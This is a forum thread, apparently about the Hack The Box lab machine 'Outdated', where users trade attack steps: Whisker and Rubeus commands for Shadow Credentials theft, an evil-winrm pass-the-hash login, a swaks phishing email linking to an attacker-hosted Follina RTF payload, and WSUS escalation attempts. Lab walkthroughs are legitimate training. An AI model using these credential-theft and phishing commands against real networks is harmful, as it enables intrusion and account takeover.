Outdated - HTB
by - Thursday, January 1, 1970 at 12:00 AM
(August 15, 2022, 09:48 AM)delmerherberth Wrote: I believe the intended path from sflowers to administrator is via wsus. Was anyone able to get root that way or am I down a rabbit hole?


Correct way.
Reply
the way i got user is via shadow credentials* https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials* download the pre-compiled binaries here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries[quote]> Whisker.exe add /target:sflowers> Rubeus.exe asktgt /user:sflowers /certificate: /password:"generated-pass" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show> evil-winrm -i 10.129.166.87 -u sflowers -H [/quote]stuck on root part, i believe this has to do with wsus, but none of the ways on https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus work yet. anyone able to compile https://github.com/GoSecure/wsuspicious?
Reply
follina is not working not getting any response back
Reply
(August 13, 2022, 09:02 PM)yumi Wrote:


it's folina
Reply
tyyyyyy
Reply
(August 15, 2022, 10:44 AM)meowmeowattack Wrote: the way i got user is via shadow credentials
* https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
* download the pre-compiled binaries here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

> Whisker.exe add /target:sflowers
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"generated-pass" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
> evil-winrm -i 10.129.166.87 -u sflowers -H <ntlm-hash>


stuck on root part, i believe this has to do with wsus, but none of the ways on https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus work yet. anyone able to compile https://github.com/GoSecure/wsuspicious?


I was able to compile it but  it still doesnt work for me
Reply
(August 15, 2022, 11:36 AM)delmerherberth Wrote:
(August 15, 2022, 10:44 AM)meowmeowattack Wrote: the way i got user is via shadow credentials
* https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
* download the pre-compiled binaries here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

> Whisker.exe add /target:sflowers
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"generated-pass" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
> evil-winrm -i 10.129.166.87 -u sflowers -H <ntlm-hash>


stuck on root part, i believe this has to do with wsus, but none of the ways on https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus work yet. anyone able to compile https://github.com/GoSecure/wsuspicious?


I was able to compile it but  it still doesnt work for me


share steps of SMTP follina
if you know cuz it's not working here
Reply
(August 13, 2022, 09:02 PM)yumi Wrote: .
Reply
(August 13, 2022, 09:02 PM)yumi Wrote:


ty
Reply
I tried
swaks --to [email protected] --from [email protected] --server mail.outdated.htb --body "http://10.XX.XX.XX/test.rtf" 
the machine will get .rtf file but the rtf payload will not work. I have try rtf payload on any.run, it is work on any.run

change rtf to doc or docx, the machine will not call back :angel:
Reply


 Users viewing this thread: Outdated - HTB: No users currently viewing.